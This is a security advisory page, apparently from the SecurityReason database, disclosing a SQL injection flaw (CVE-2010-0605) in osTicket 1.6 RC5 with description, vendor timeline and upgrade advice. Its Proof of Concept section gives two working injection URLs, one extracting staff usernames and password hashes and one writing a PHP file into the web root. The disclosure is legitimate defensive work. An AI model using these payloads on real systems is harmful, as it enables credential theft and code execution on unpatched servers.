|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7015 CVE : CVE-2010-0605 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : No Credit : Nahuel Grisolia Published : 14.02.2010
Advisory Content : Advisory Name: SQL injection in osTicket Vulnerability Class: SQL injection Release Date: 2010-02-09 Affected Applications: Confirmed in osTicket 1.6 RC5. Other versions may also be affected. Affected Platforms: Multiple Local / Remote: Remote Severity: High – CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) Researcher: Nahuel Grisolía Vendor Status: Acknowledged/Fixed. New release available: osTicket 1.6 Stable or check http://osticket.com/forums/project.php?issueid=176 Vulnerability Description: A Vulnerability has been discovered in osTicket, which can be exploited by malicious people to conduct SQL injection attacks. Input passed via the "input" parameter to ajax.php is not properly sanitized before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is confirmed in version 1.6 RC5. Other versions may also be affected. Proof of Concept: http://x.x.x.x/upload/scp/ajax.php?api=tickets&f=searchbyemail&input=nah%27 %20%20union%20sel ect%20username,passwd%20from%20ost_staff--%20and%20%27%%27%20LIKE%20%27 http://x.x.x.x/upload/scp/ajax.php?api=tickets&f=searchbyemail&input=nah%27 %20%20union%20sel ect%20%27%3C?php%20phpinfo%28%29;%20?%3E%27,%27%27%20into%20outfile%20%27/v ar/ www/upload/images/info.php%27--%20and%20%27%%27%20LIKE%20%27 Impact: Execute arbitrary SQL queries. Solution: Upgrade to osTicket 1.6 Stable or check http://osticket.com/forumsd/project.php?issueid=176 Vendor Response: January 9, 2010 – First Contact January 10, 2010 / February 4, 2010 – Updates on resolution February 9, 2010 – Latest version and patch available February 9, 2010 – Public Disclosure of the Vulnerability Contact Information: For more information regarding the vulnerability feel free to contact the researcher at nahuel.grisolia <at> gmail <dot> com References : http://osticket.com/forums/project.php?issueid=176
http://www.securityfocus.com/bid/38166
http://www.exploit-db.com/exploits/11380
http://secunia.com/advisories/38515
http://packetstormsecurity.org/1002-exploits/osTicket-1.6-RC5-SQLi.pdf  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |